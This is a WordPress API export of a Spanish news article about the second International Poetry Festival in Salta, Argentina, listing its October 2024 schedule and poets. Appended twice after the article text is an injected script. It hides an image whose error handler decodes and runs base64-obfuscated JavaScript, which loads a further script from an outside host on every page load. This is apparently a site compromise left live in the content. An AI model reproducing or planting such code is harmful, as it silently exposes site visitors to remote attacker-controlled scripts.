{"id":4513,"date":"2024-10-18T11:26:10","date_gmt":"2024-10-18T14:26:10","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4513"},"modified":"2025-08-13T23:46:58","modified_gmt":"2025-08-14T02:46:58","slug":"empezo-en-salta-el-festival-internacional-de-poesia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4513","title":{"rendered":"Empez\u00f3 en Salta el Festival Internacional de Poes\u00eda"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-6d83d4d007c0fdc93b1adc8f59674e4d\" style=\"background-color:#91054d\"><em>Hasta el domingo 20 de octubre, Salta reunir\u00e1 a 31 poetas locales, nacionales e internacionales en diversos espacios culturales de la ciudad.<\/em><\/h4>\n\n\n\n<p>Ayer di\u00f3 inicio el II Festival Internacional de Poes\u00eda de Salta, un evento cultural que posiciona a la ciudad como un punto de encuentro para la poes\u00eda contempor\u00e1nea a nivel internacional. Organizado con el apoyo de la\u00a0<strong>Secretar\u00eda de Cultura de la Provincia<\/strong>, contar\u00e1 con la participaci\u00f3n de destacados poetas de diversas latitudes, consolid\u00e1ndose como un espacio de intercambio y reflexi\u00f3n sobre la creaci\u00f3n po\u00e9tica.<\/p>\n\n\n\n<p>Esteban Singh, poeta salte\u00f1o y miembro de la comisi\u00f3n organizadora, destac\u00f3 la relevancia de esta segunda edici\u00f3n, que busca resaltar el patrimonio po\u00e9tico de la provincia. \u201cEste festival no ser\u00eda posible sin el apoyo de la Secretar\u00eda de Cultura. Nos permite poner en valor el acervo po\u00e9tico de la provincia y proyectarlo tanto a nivel nacional como internacional\u201d, expres\u00f3.<\/p>\n\n\n\n<p>La inauguraci\u00f3n oficial se llevar\u00e1 a cabo ayer en el Teatro de la Fundaci\u00f3n Salta, ubicado en Gral. Mart\u00edn Miguel de G\u00fcemes 434.&nbsp;<\/p>\n\n\n\n<p>Este evento, que se extender\u00e1 hasta el domingo 20 de octubre, es&nbsp;un espacio \u00fanico para disfrutar de la diversidad po\u00e9tica de autores de diferentes pa\u00edses y regiones de Argentina. Las actividades se desarrollar\u00e1n en diversos puntos emblem\u00e1ticos de la ciudad, como el SUM de la Usina Cultural y el Cabildo Hist\u00f3rico de Salta, con una variada programaci\u00f3n de recitales, mesas de discusi\u00f3n y presentaciones de libros.<\/p>\n\n\n\n<p><strong>Cronograma de actividades<\/strong><\/p>\n\n\n\n<p>Hoy&nbsp;viernes 18 de octubre, las actividades comenzar\u00e1n a las 11:00 horas en el SUM de la Usina Cultural, con un recital que incluir\u00e1 a poetas como Claudio Revuelta (La Rioja), Fernanda Salas (Salta), P\u00eda Cabral (Catamarca) y Ra\u00fal Eduardo Rojas (Salta). A las 12:00 horas, se presentar\u00e1n Jacqueline Manoff, Alejandro Luna y Juan Santiago Avenda\u00f1o. La jornada de la tarde incluye una mesa sobre el movimiento po\u00e9tico \u00abNorte Entero\u00bb, seguida de m\u00e1s recitales po\u00e9ticos que reunir\u00e1n a poetas de Argentina, Chile, Malta y Colombia, finalizando el d\u00eda con una presentaci\u00f3n a las 19:00 horas que contar\u00e1 con poetas de diversas provincias argentinas.<\/p>\n\n\n\n<p>Ma\u00f1ana&nbsp;s\u00e1bado 19 de octubre comenzar\u00e1 con una mesa sobre poes\u00eda y naturaleza, que estar\u00e1 a cargo de Aldo Parfeniuk y Pedro Solans, a las 12:00 horas en la Fundaci\u00f3n Salta. Por la tarde, las actividades se trasladar\u00e1n al Cabildo Hist\u00f3rico de Salta, donde se desarrollar\u00e1n una mesa sobre la creaci\u00f3n po\u00e9tica a las 17:30 horas y un recital a las 18:45 con la participaci\u00f3n de autores provenientes de Bolivia, Per\u00fa y diversas regiones de Argentina. El d\u00eda cerrar\u00e1 con un recital po\u00e9tico a las 19:45 horas, en el que participar\u00e1n poetas de Ecuador, Honduras y Argentina.<\/p>\n\n\n\n<p>Finalmente, el domingo 20 de octubre, el festival concluir\u00e1 en el SUM de la Usina Cultural a las 17:30 horas con la presentaci\u00f3n del libro II Festival Internacional de Poes\u00eda de Salta. Antolog\u00eda po\u00e9tica, un volumen que recopila la obra de los poetas participantes en esta edici\u00f3n. Este evento de clausura contar\u00e1 con la presencia de numerosos poetas internacionales y nacionales, como Claudio Revuelta, P\u00eda Cabral, Mar\u00eda Paula Alzugaray, Leo Lobos, Pedro Solans, Jos\u00e9 Zuleta Ortiz, Renato Sandoval Bacigalupo, Rolando Kattan, entre otros.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hasta el domingo 20 de octubre, Salta reunir\u00e1 a 31 poetas locales, nacionales e internacionales en diversos espacios culturales de la ciudad. Ayer di\u00f3 inicio el II Festival Internacional de Poes\u00eda de Salta, un evento cultural que posiciona a la ciudad como un punto de encuentro para la poes\u00eda contempor\u00e1nea a nivel internacional. Organizado con [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4514,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-4513","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4513"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4513"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4513\/revisions"}],"predecessor-version":[{"id":6658,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4513\/revisions\/6658"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4514"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4513"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4513"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4513"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}